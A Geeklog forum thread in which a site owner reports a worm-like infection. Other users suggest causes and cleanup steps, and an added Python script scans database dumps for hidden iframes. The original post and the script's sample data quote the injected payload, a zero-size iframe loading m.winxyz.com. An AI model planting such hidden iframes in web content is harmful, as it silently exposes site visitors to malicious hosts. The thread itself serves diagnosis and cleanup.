Geeklog Forums
worm infection
ismael
Anonymous
Hi,
Last night I suffered a worm infection. I use Geeklog 1.4.1. All my stories and comments have an m.winxyz.com reference.
Thank you,
ismael
ismael
Anonymous
Every new user has this website in his profile: <iframe src=http://m.winxyz.com width=0 height=0></iframe>
ismael
Anonymous
Can it be due to FCKeditor SQL injection?
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
No idea where it's coming from but it sounds like files on your server were modified, so it could be that your server was compromised.
Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.
Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.
bye, Dirk
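Dirk's suggestion to check the database backup for the injected link, sketched as an added example (not part of the original thread and not Geeklog code): it scans a mysqldump-style file for invisible iframes like the one quoted above and reports the table and host they appear in. The table names and dump lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Any opening <iframe ...> tag (closing </iframe> tags do not match).
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# src value, quoted or unquoted; mysqldump escapes quotes as \" or \'.
SRC_RE = re.compile(r"""\bsrc\s*=\s*\\?["']?([^\s"'>\\]+)""", re.IGNORECASE)
INSERT_RE = re.compile(r"^INSERT INTO `?(\w+)`?", re.IGNORECASE)

def is_hidden(tag):
    """True when both width and height are set to 0 (or 0px)."""
    return all(
        re.search(rf"""\b{attr}\s*=\s*\\?["']?0(?:px)?\b""", tag, re.IGNORECASE)
        for attr in ("width", "height")
    )

def scan_dump(lines):
    """Count hidden iframes per (table, host) in the INSERT lines of a SQL dump."""
    hits = Counter()
    for line in lines:
        insert = INSERT_RE.match(line)
        if not insert:
            continue
        for tag in IFRAME_RE.findall(line):
            if not is_hidden(tag):
                continue  # visible embeds (e.g. a video player) are not flagged
            src = SRC_RE.search(tag)
            url = src.group(1) if src else ""
            host = urlsplit(url).hostname or url or "(no src)"
            hits[(insert.group(1), host)] += 1
    return hits

# Constructed sample dump lines; the table names are assumed for illustration.
SAMPLE_DUMP = [
    "INSERT INTO `gl_stories` VALUES ('a1','Intro<iframe src=http://m.winxyz.com "
    "width=0 height=0></iframe>'),('a2','clean story');",
    r"INSERT INTO `gl_comments` VALUES (1,'hi <IFRAME height=\"0\" width=\"0\" "
    r"src=\"http://m.winxyz.com/\"></IFRAME>');",
    "INSERT INTO `gl_userinfo` VALUES (2,'<iframe src=http://video.example/embed "
    "width=560 height=315></iframe>');",
]

if __name__ == "__main__":
    # For a real backup, pass an open file object: scan_dump(open("backup.sql"))
    for (table, host), count in sorted(scan_dump(SAMPLE_DUMP).items()):
        print(f"{table}: {count} hidden iframe(s) pointing at {host}")
```

If the scan reports hits, the database itself carries the injected markup and replacing the files alone will not remove it.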
ismael
Anonymous
More info about this.
I detected that the problem comes from a user that has story admin privileges. It seems that this user has a trojan that takes access to my Geeklog site and modifies his stories.
Now this user is suspended, but I'm really worried about this situation if the security of my site depends on my users' security.
This morning, all accounts on my site have their profile modified, also my profile as admin. I can't explain it myself.
The Geeklog files have not been modified.
Thank you,
ismael
guganbl
Forum User
Chatty
Registered: 05/12/07
Posts: 57
I had a similar problem some time ago. The reason was a compromised FTP account.
The person that used that account had a virus and from that moment something started inserting lines that pointed to other infected sites in my gl. I downloaded the complete gl, and scanned all files to find the code, and then replaced those files.
A faster way to deal with this is to replace all files, and use the same old DB as Dirk told you.
And change the password on your FTP account, just in case.